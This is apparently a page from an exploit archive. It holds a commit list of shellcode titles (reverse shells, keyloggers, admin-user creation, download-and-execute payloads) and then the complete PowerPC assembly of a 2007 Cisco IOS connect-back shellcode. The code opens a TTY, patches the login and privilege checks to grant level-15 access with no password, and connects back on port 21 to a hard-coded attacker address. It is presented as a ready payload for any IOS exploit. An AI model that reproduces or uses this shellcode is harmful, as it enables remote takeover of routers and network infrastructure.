
27 changes to exploits/shellcodes Oracle JDeveloper 11.1.x/12.x - Directory Traversal Shopware 5.2.5/5.3 - Cross-Site Scripting CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities PHPFreeChat 1.7 - Denial of Service OTRS 5.0.x/6.0.x - Remote Command Execution DarkComet (C2 Server) - File Upload BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes) FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode HP-UX - execve(/bin/sh) Shellcode (58 bytes) Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode HP-UX - execve(/bin/sh) Shellcode (58 bytes) Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes) Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes) Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes) Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes) Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes) Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes) Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes) Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes) Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode Windows (9x/NT/2000/XP) - PEB method Shellcode (29 bytes) Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes) Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes) Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes) Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes) Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes) Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes) Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes) Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes) Windows (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes) Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes) Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes) Windows/x86 (XP SP2) (French) - calc Shellcode (19 bytes) Windows/x86 (XP SP2) (French) - calc.exe Shellcode (19 bytes) Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes) Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes) Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes) Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes) Windows/x86 (XP SP3) (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes) Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes) Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes) Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes) Windows/x86-64 (7) - cmd Shellcode (61 bytes) Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes) Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes) Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes) Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) Windows/x86 (XP Professional SP3) (English) - Add Administrator User (secuid0/m0nk) Shellcode (113 bytes) Windows/x86 - Add Administrator User (secuid0/m0nk) Shellcode (326 bytes) Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes) Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes) Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes) Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes) Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes) Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes) Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes) Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes) Windows/x86 - Create Admin User (X) Shellcode (304 bytes) Windows/x86 - Create Administrator User (X) Shellcode (304 bytes) Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes) Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes) Windows/x86 (XP Professional SP2) (English) - Wordpad.exe Shellcode (15 bytes) Windows/x86 (XP Professional SP2) - calc.exe Shellcode (57 bytes) Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes) Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes) Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes) Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes) Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes) Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes) Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)
135 lines
No EOL
3 KiB
NASM
135 lines
No EOL
3 KiB
NASM
# ----------------------------------------------------------------------------------------
|
|
#
|
|
# Cisco IOS Connectback shellcode v1.0
|
|
# (c) 2007 IRM Plc
|
|
# By Gyan Chawdhary
|
|
#
|
|
# ----------------------------------------------------------------------------------------
|
|
#
|
|
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back
|
|
# on port 21
|
|
#
|
|
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
|
|
#
|
|
#
|
|
# The following five hard-coded addresses must be located for the target IOS version.
|
|
#
|
|
# The hard-coded addresses used here are for:
|
|
#
|
|
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
|
|
#
|
|
# ----------------------------------------------------------------------------------------
|
|
.equ malloc, 0x804785CC
|
|
.equ allocate_tty, 0x803d155c
|
|
.equ ret, 0x804a42e8
|
|
.equ addr, 0x803c4ad8
|
|
.equ str, 0x81e270b4
|
|
.equ tcp_connect, 0x80567568
|
|
.equ tcp_execute_command, 0x8056c354
|
|
.equ login, 0x8359b1f4
|
|
.equ god, 0xff100000
|
|
.equ priv, 0x8359be64
|
|
# ----------------------------------------------------------------------------------------
|
|
|
|
main:
|
|
stwu 1,-48(1)
|
|
mflr 0
|
|
stw 31,44(1)
|
|
stw 0,52(1)
|
|
mr 31,1
|
|
li 3,512
|
|
lis 9,malloc@ha #malloc() memory for tcp structure
|
|
la 9,malloc@l(9)
|
|
mtctr 9
|
|
bctrl
|
|
mr 0,3
|
|
stw 0,20(31)
|
|
lwz 9,12(31)
|
|
li 0,1
|
|
stb 0,0(9)
|
|
lwz 9,12(31)
|
|
lis 0,0xac1e # connect back ip address
|
|
ori 0,0,1018 #
|
|
stw 0,4(9)
|
|
li 3,66
|
|
li 4,0
|
|
lis 9,allocate_tty@ha # allocate new TTY
|
|
la 9,allocate_tty@l(9)
|
|
mtctr 9
|
|
bctrl
|
|
addi 0,31,24
|
|
|
|
# Fix TTY structure to enable level 15 shell without password
|
|
#
|
|
#
|
|
##########################################################
|
|
|
|
# login patch begin
|
|
lis 9, login@ha
|
|
la 9, login@l(9)
|
|
li 8,0
|
|
stw 8, 0(9)
|
|
# login patch end
|
|
|
|
#IDA placeholder for con0
|
|
#
|
|
# lis %r9, ((stdio+0x10000)@h)
|
|
# lwz %r9, stdio@l(%r9)
|
|
# lwz %r0, 0xDE4(%r9) #priv struct
|
|
#
|
|
# priv patch begin
|
|
lis 9, priv@ha
|
|
la 9, priv@l(9)
|
|
lis 8, god@ha
|
|
la 8, god@l(8)
|
|
stw 8, 0(9)
|
|
# priv patch end
|
|
|
|
###########################################################
|
|
|
|
li 3,0
|
|
li 4,21 # Port 21 for connectback
|
|
lwz 5,12(31)
|
|
li 6,0
|
|
li 7,0
|
|
mr 8,0
|
|
li 9,0
|
|
lis 11,tcp_connect@ha # Connect to attacker IP
|
|
la 11,tcp_connect@l(11)
|
|
mtctr 11
|
|
bctrl
|
|
mr 0,3
|
|
stw 0,20(31)
|
|
li 3,66
|
|
lwz 4,20(31)
|
|
li 5,0
|
|
li 6,0
|
|
li 7,0
|
|
li 8,0
|
|
li 9,0
|
|
li 10,0
|
|
lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
|
|
la 11,tcp_execute_command@l(11)
|
|
mtctr 11
|
|
bctrl
|
|
lwz 11,0(1)
|
|
lwz 0,4(11)
|
|
mtlr 0
|
|
lwz 31,-4(11)
|
|
mr 1,11
|
|
|
|
###########################################
|
|
lis 9, addr@ha
|
|
addi 0, 9, addr@l
|
|
mtctr 0
|
|
xor 3,3,3
|
|
addi 3,0, -2
|
|
lis 10, str@ha
|
|
addi 4, 10, str@l
|
|
bctrl
|
|
lis 10, ret@ha
|
|
addi 4, 10, ret@l
|
|
mtctr 4
|
|
bctrl
|
|
|
|
# milw0rm.com [2008-08-13] |